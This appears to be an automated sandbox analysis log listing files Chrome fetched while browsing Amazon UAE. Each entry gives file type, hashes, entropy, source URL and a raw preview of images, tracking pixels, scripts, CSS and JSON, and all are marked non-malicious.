                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 219x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7347
                                                                                                                                                                                                                                                                Entropy (8bit):7.947096958801787
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:LW3m5aJ34UaPDQWGrIPVnyg0rQPJ3vecEYVLDWTKy+HxH2:LW3m5TTDorIRvik3vzEYxW5+HV2
                                                                                                                                                                                                                                                                MD5:A1618E2DBD660E5E0148A8AF60E6138F
                                                                                                                                                                                                                                                                SHA1:40282B6CB047BAFD8F88973DD7B1C15906B735B2
                                                                                                                                                                                                                                                                SHA-256:1D9BF1511006BD908CB4D88368EF9D850B33F21CCA29A5A7B446806D35EAB468
                                                                                                                                                                                                                                                                SHA-512:F247F3AE41E8B18C3E8A6BB3A7850B28148909F7C89F1A593855CB257EA3EDABE93534162714DA4B4B38A5D253E11DCC80AED8F774F24A472138C7C45DEB7BDC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61r-8obHj2L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.A."Qaq..2BR.....#br.s.$3S...4c.%.........................................................!1AQ.."aqr..#2....$3..R................?..Z...!.@....!.@....!.@............*..zd.p.?.D.[Rv.-|.?W...'c.....[..Zi58.5.sO+#ok....1>.8..p2.h\t..W?....Ff+.4..L..y...<.....f7.M._...$..o....ql.t.#..9..J...C...W.b..C.2....sX2...v..U}N."..l-.s.....3..5?...{....}.X\=....w<i..A.u.z...o..}M6%R*....,.....C...\.n.8<g...lA..Z......u.3........'..^.........ms.*..v=....a.c..,.N.H?..|...,.....*P{.B..8.. ..B... ..B... ..B...........$....er\c.....=....}....&...M*..o4.^......|...............q.g...RNG8?.s.s;S.....9.[.q..:c~..7j.{5w......'.x...n$..T9.....F..Q....h.../...q...1.h......S.3#...w...6..3...:p&$H(^.I.6m...?y.v...$.c...)....5c....`.@Z.Q..............%.i.o.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4538
                                                                                                                                                                                                                                                                Entropy (8bit):7.479926084993934
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TAYSlh0R4pbb2y4f3y8VVBB20UrFjivJEvBRxk9whi8gIFHB8nyhI8:8YrR82y4f3FzBdUrxblk8gS8nyhI8
                                                                                                                                                                                                                                                                MD5:7DF5507CF40C144EC38FC15063F6D9E3
                                                                                                                                                                                                                                                                SHA1:9EC51EB6A3B8574A00C7F9BC7BE5ED71F47317FC
                                                                                                                                                                                                                                                                SHA-256:8B1BDA6979D26A784CE28A25F0324DCD16308AAB7389969E014662BAF8AB38A2
                                                                                                                                                                                                                                                                SHA-512:8DF67D791816AD55980DAFC3A1EE6583F576F5125FE63110E4B795674881F7AF8672C33EF744CDD45BECB07C4E6C75238555AAC3EBE2A9ACB5829E40C0DE1945
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................`.....n^.F... ..........................c.z.lh......................B.b.W..^7..E........................f.U...6...].........................O^._YQ-'........................r.[.N...MG.r..,.....................G..h.K>.'foD.......................3.=W,.+..%............................V3.m{../........................x..W*.g.[.s......................9...... *:v..........................F.R6U.G.r..G0....................@......gm^.t_......................n.c....t...;!v ....................]Um.........|..d....................9H&..p....H..`.Z.a)..%....................6._..=:I.;..\......X...5.S......................$S=..]L....V>d.2..V....N....................i7b.O..:.L....1NH...]@....................0s.U..4.{..Wx........&.............
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 209x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9034
                                                                                                                                                                                                                                                                Entropy (8bit):7.94591351039504
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:4/4nC6p3qpgydQUSaqR9XsEUNskt4+r0jLcXvMdqdMZ9pmVbwemWoe:4/4nC6pMgkQhTXcHp5AZFZ+VbOWoe
                                                                                                                                                                                                                                                                MD5:1A97313C593B43F8D0B90CA7DA9F1976
                                                                                                                                                                                                                                                                SHA1:157AFE52E07D3538C9F4687C5165D8012CF9391E
                                                                                                                                                                                                                                                                SHA-256:174C76D666EBEECA504D5D99EDFFDAFE11F5FC95E7BD03630898E0F4432797FB
                                                                                                                                                                                                                                                                SHA-512:E212CDA142D9D925A0F22A06D28BE2FBF26EF356CF4DBE1863F58CF96BAA00829C8FE12749C5229850B598ADA3119DFD8F78FD3CEBCDEA38805AD0B33811B881
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/916ke72wlWL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.AQ.."aq#2B.......3CRb....TUr.........$%4DES................................................!1A.Q2"aq................?..(..(.....(..(..(...~.}..;;)V;.....w..0....D+.~7 R..B}o.F.....i.D2e.Al........(.$.......Xu.R..A,..."D{W..X!.n....J.#.e.K.9I ..g...3..\7.K.n..h..!...:sH.4h...+.`........;.vv%..Mf.7....[.z....~n.a.5%.ugXt..G.i|.2+........G.N+...[F..!6.......#.#}.e.u!..4.y.e{......}.\L.b*...r..!N.....H..g...=>.|K-..DL...U?fX.l.C...].x..'.uv........g|.....%.N3..c.A.~..>...YD.......(..(..(..(.....(..(..(..(.....(....I.....O...x.V.Q.y.gj.b..x..Vx...Wo...m7I{(...+......[d-E..h....|..d.........#.Q.-......E..A.[.kl."..Q.eT.@..+G0..(...+.e.......2..6.#....L....-w.Y.i!ry....<R~M0'..<..........e...#].a0.s...V'O.v...5F.7.S-.;..a.........7..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11395
                                                                                                                                                                                                                                                                Entropy (8bit):7.900504506758376
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YFoKfC8FTMzA7MVHeIL4xoeGcH2zL4a4KVCK5GBQks4SzPYeV9S:u68xXGcH8L4a4KVtsez6
                                                                                                                                                                                                                                                                MD5:1BC1451C4CAC3EA83E34C2C383EEF101
                                                                                                                                                                                                                                                                SHA1:F93DFE6BA318BCC442D6C9B961E71CED93B04EF7
                                                                                                                                                                                                                                                                SHA-256:ECB2398C5D0A7E58B133C795847455150F12C20C384F94A825CBA2C0680F8B95
                                                                                                                                                                                                                                                                SHA-512:36B95A4208965CEB6A483CD4387571C4B15835AA48299733552B495EFA77FF09F0B564E9E81ED70C919DF7C5B7F19CE87C19B1AA883517FC752EE865929C504B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.....7...{.|.z.}..{.~..QgB._..,...........\W.<..O@.......y(..9.8ts.......Z.Ws...\!(......1......Z!....=.|...nU..&...u|..U..}.uh.v....'..e_....,........t.:@.....W....v....uk.Z.....~.h..`....O,.+....).....'....H.....tJ......)Wz..}p.....D............m.........U...=........|.Y\.DOJ....]!...KS.5..`........w<.........8u......'_M..[6tQ.............p.....a..5..T...G&.Q......p.....\r...9x......=.n....9pi.f.......r..H...............L\.^.E..\.J1u.-l....&....V..`...........G!....!..........*R'G".1Y..:..a..:I~|..M.g.........`.....E.C.q.H........-...b.W......#..GA-.X.|..7\<......)).1..............J...2ls.....j ...K.=-c3`........0.=..y..|..Z@.......e.........i..).h....)..Fv
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):131437
                                                                                                                                                                                                                                                                Entropy (8bit):5.540783290092949
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:AqFarXxC3oTgbWZZRwi+vIsef+ixcxox0UIxrxyxEvUFtkU9Jx:1aDLgUBgIL7Jx
                                                                                                                                                                                                                                                                MD5:E11C95A7327FA979233BFC6BC41D7BD9
                                                                                                                                                                                                                                                                SHA1:B8BFC896A46AF83FF44E6A2C51BB406C3AB6623A
                                                                                                                                                                                                                                                                SHA-256:37770391714B7B35CBAAFF47F2810743BF2BE5E6C6BE36AA8F20E9C38B747772
                                                                                                                                                                                                                                                                SHA-512:D70A7C82F0E87F23ECC259A256B3613E098F5C93B52644366E05FA22248BDF09C6E5F951F34C04BCBD63B1079323184A2ECC481BCE4617A304556F42B7CF94B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1052)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1249
                                                                                                                                                                                                                                                                Entropy (8bit):4.871132149627306
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:qZSm5kuVTnjQZY9xhhWHdBb/xdG4cV5FiWe:qZ7iiB491Gk
                                                                                                                                                                                                                                                                MD5:AB126768E6A50318ED4D240903AAC24B
                                                                                                                                                                                                                                                                SHA1:582407CADA35F833A8FCC66EDECAB6594A4A14FD
                                                                                                                                                                                                                                                                SHA-256:4E90E5725D57B2C91F9CB4421F925DC222A14501256426B4B564939879ABF2CA
                                                                                                                                                                                                                                                                SHA-512:61C69910BD8104DEA561876E6B1493B6809C994835DD8CA6A7E69C4BD5486E3284280B548179EBADB93D46DC553BA6B04D29049A8F4A70D7821CD4ECF491B8D7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01rdVnPkgmL._RC%7C01CzAMryqJL.css_.css?AUIClients/ListsDesktopCartMoveToListAssets
                                                                                                                                                                                                                                                                Preview:.create-list-form{margin-bottom:0}.wl-spacing-top-quad-large{margin-top:8.4rem}#create-list-back-navigation{padding-right:10px}#create-list-back-icon{margin-top:4px}./* ******** */..cldd-list-option-default{border-color:#D5D9D9!important;background-color:#EDFDFF;border-left-color:#007185!important}#cldd-popover-inner{width:max-content;min-width:200px;max-width:220px;max-height:220px;overflow-y:auto;overflow-x:hidden;border-bottom-left-radius:0;border-bottom-right-radius:0}#cldd-popover-inner li{position:relative}#cldd-popover-inner a{padding-left:10px}#cldd-popover-inner td{vertical-align:middle;padding:0}.cldd-list-privacy{display:block;line-height:1!important}#cldd-show-more-lists-content{padding-top:8px;margin-left:auto;margin-right:auto;margin-bottom:0;width:max-content}#cldd-plus-icon{vertical-align:middle;font-size:30px!important;margin-right:10px}#cldd-rich-content{padding-top:10px;padding-bottom:14px;padding-left:10px;padding-right:10px;border-top-left-radius:0;border-top-right
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://aax-eu.amazon.ae/x/px/RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk/atf/%7B%22atf%22:false%7D
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Asi%26si%3D529%26pc%3D4844%26at%3D4844%26t%3D1723469068780%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4844
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):29858
                                                                                                                                                                                                                                                                Entropy (8bit):5.407093913169903
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Tlb1d3+dHJ67FPpE3eFNxQoRvL4aX+wgvDv5IPg4empqsRU+/jfrY6bV6akWvBiP:TlhJOpGPpEuKoZLbP2grqaP3bRsKCKC
                                                                                                                                                                                                                                                                MD5:2B5EC8C8178648376BF92E7051C0B341
                                                                                                                                                                                                                                                                SHA1:F86966BD139867744DECAC273383CCB8B28FF81E
                                                                                                                                                                                                                                                                SHA-256:D4F527134C2FCD4F5D8055240883E13AD9E21876AC27E44EB7F0C152F0F5E884
                                                                                                                                                                                                                                                                SHA-512:3BA0B6DA553CFB09FDF645D8AD17337F8EEBF7BF1E1B3C428978583E139AFA26B6DAF79156840D6BA1A0ABFC0F0938638F7986BB70DF9DF7EEA1E65120409100
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/hz/rhf?currentPageType=ShoppingCart&currentSubPageType=Cart&excludeAsin=&fieldKeywords=&k=&keywords=&search=&auditEnabled=&previewCampaigns=&forceWidgets=&searchAlias=&cardJSPresent=true
                                                                                                                                                                                                                                                                Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-8WMsC content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-13A13S0H6S9EN3TGWNNJ pd_rd_wg-ws3ZF pd_rd_r-9ba5cba1-575a-49ac-a2bc-2484646b9df8 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstanceUORXe7MROtpRI4-RpYl3NA\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):167
                                                                                                                                                                                                                                                                Entropy (8bit):5.111279005374292
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxocJ+qlkGOcFSKPCxvZ60WaNXbZ6+3vLKXAhvGXI9F4:haxB0qlkGOqRGMJaNX96IvLKXAhdI
                                                                                                                                                                                                                                                                MD5:C2076D9EB8087664920133620E56DA58
                                                                                                                                                                                                                                                                SHA1:946566C37B1C622F0C9D5B603A3C2DD6DA393ADA
                                                                                                                                                                                                                                                                SHA-256:075E99E9705C6718F9F73FD8214CB914207D723A8E4E5C763E11B72B9F820A8E
                                                                                                                                                                                                                                                                SHA-512:66DBF81CBBA177BFA500037BA7D39913EE4828C6E6534FBC55D64258CFC3FA2D3C2C832F71823541EA3F86D5DF1363B1C998F24E8F385C996AF262139B17A979
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (560)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):22850
                                                                                                                                                                                                                                                                Entropy (8bit):5.310742006440315
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:D25pTmt/w5MqCmT2yuER7oBJcj6bhAsoAFXE6X8g+KUyer1CPC3ei1ZQnGr:DHI2kQBGj6F7oAFXE6Xt+dyeBCPC3ei9
                                                                                                                                                                                                                                                                MD5:BAF5426671F29B1217B5550FA9BDE7B8
                                                                                                                                                                                                                                                                SHA1:8A588BC594DF4045EDEE10A07F2722B09C7325AF
                                                                                                                                                                                                                                                                SHA-256:7685C328FE8BC4DBC0C5FC6CF3AD21E56ECCBD325542FFEFBD653327073219C6
                                                                                                                                                                                                                                                                SHA-512:32F339DF56F026FB459A7A5F542ED52CE90986BC15B02D5469825EA60E0A95554042C05602A4FC5316736BC3481067E757E7EB0E840EF097A21FC385B9A1EB46
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(d){var f=window.AmazonUIPageJS||window.P,k=f._namespace||f.attributeErrors,a=k?k("ListsCommonUtilityAssets",""):f;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,f,k){d.when("A").register("al-ajax-response-state-parser",function(a){var b=a.$;return{getState:function(c){c=b(c).filter("#listsAjaxResponseStateSection");var e=b("#listsAjaxResponseStateSection");e&&0<=e.length&&e.remove();b(c).appendTo("body");a.state.parse();c=a.state("listsAjaxResponseState")||.{};return{hasError:c.hasError,authRequired:c.authRequired,authUrl:c.authUrl,error:c.error}}}});"use strict";d.when("A","al-bottomsheet-with-fallback","iphone-x-detector").register("bottom-sheet-utils",function(a,b,c){var e=a.$;a.declarative("al-sheet-with-fallback","click",function(e){e.$event.preventDefault();var a=e.data;e=b.create(b.buildComponentParams(a.componentName,a.showCloseButton,c.getAdjustedHeightPx(a.bottomsheetHeight),a.popoverHeight,a.popoverWidth,a.headerForPopover,a.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3947
                                                                                                                                                                                                                                                                Entropy (8bit):7.880130399098271
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rm6J1qbdMxFyBycnuKW98T/owjqjcelV3f2B8d0v/3qYj4ye8svFmuaNtPucP:TMEU+yWZLTqte8+v/3qYDejNqhGWwLHk
                                                                                                                                                                                                                                                                MD5:1981E40984A2A7258D39AF758FE80E3C
                                                                                                                                                                                                                                                                SHA1:708E5C1329252F61A2655DB9D9161CFAEAB4F601
                                                                                                                                                                                                                                                                SHA-256:AE5A1DB70BAD4052B25E3B8B094B990B556DD820312FB08417D68BD2C5433A55
                                                                                                                                                                                                                                                                SHA-512:42A4EDE64F240716671E72162F3FE086F9BA7E6AA5ADB9B8273E6A20EE177E9000C49FBEAAC636590F07FEE2F021A5135702819E831F0F6CDF638B0C67CC6C94
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A..."Qaq.....#2r.....BSs.....$%3CRbct.4................................................!1A2..............?..=[.I....1..-..t.m..Qj...*.A#,H.3f..L....s.]pr.P.m....4{....!....%..1.nm[.Nv.O.."L.j..%.P..z,..x!n......7......'.6...x.CkC.......S.t.....im.J.....2.@.#u.8.y.t....f...(.L.[0[i&N.....v..Z.(./Cv.IK..GN...g.z.l:..)Z....]eu.c..h...L[.J..`..':..[.......^d.!..7/.....s.*0U..n..aOJ.g.9.c..]...p...._>FY.-5@....-Og.&..t.SQm.I.k.H.)...2.>.......Y'.c../.....&...;R....+.m=$...{.yTE:\...S...mw..;Q..9....%.......N.?]Hm..?\.....GG.}i.d..d...y..+.../!.p.5zT.ZU.V}.~N.?F.uu.......,um.#0..=.+.%.......F.9.y..g..V...f.....O.....Yv.;u...6....B............5...3..Y..P........W.HQ....B..4....%A..yx.D...%./...=mt......-.........W.."1.$..Q.Ki..w*.W
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):18692
                                                                                                                                                                                                                                                                Entropy (8bit):7.9309994475399055
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:TrtMnEigXzghlNopWgz1eRSGo36GlWXcWzjc:P+EigXzg7ypWUIJLc
                                                                                                                                                                                                                                                                MD5:81B32E56F2BDD8CC70BD71E69598A8F7
                                                                                                                                                                                                                                                                SHA1:1F5E0D177D2A411FE09AFC9053F12C1E346A5190
                                                                                                                                                                                                                                                                SHA-256:F91770A26A56A7DF5B82C9FFA14123203A5B3A19565E55BBC8C7D174834E3E14
                                                                                                                                                                                                                                                                SHA-512:A988E44919FEAF40B603A9D4C48DFB1D82FD844D051D002E6AF06A3696F8C5F7926938B3AEA02A3FDE23AC3D3C0402CFB69DA19BE0FD2AD272C73A065ACDF61D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41C6hPvag5L._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................................................................pv....................#..9d...E.....m..3b.}..........................85VR.i.`....z..3...G;.jv..i...@........5....Eh,.U....C'QV........s.P..Sjt..t..m=.>.8.c`.7A......[[................c0..%...3.<.m.z3......_..\r.......0f.j?.R.{..}....:Y..P...F...[Y.S.@.......c..7c.{.g]#.lsa...W..8.9.k.y..#.......4.~..>w/.6[..kWa..>.kl.A(..........g53f......|*u1.eD......g..4.......0..j...#T.\...........G.$...]m.5.c.L.S9..+.l..0......................;t>G.}@.MML.k..]..(........89Y1J..'.J...Q...L.V......z..OC..................m.7......{.......d....f...K$$y.#u...z.}..+.d.....{..{.e._....O.v3Ol#..y..s`......VK.......f..........f......S[.[..F.Th.s{....h...]t....B.6..X..c....|..re..z..H
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
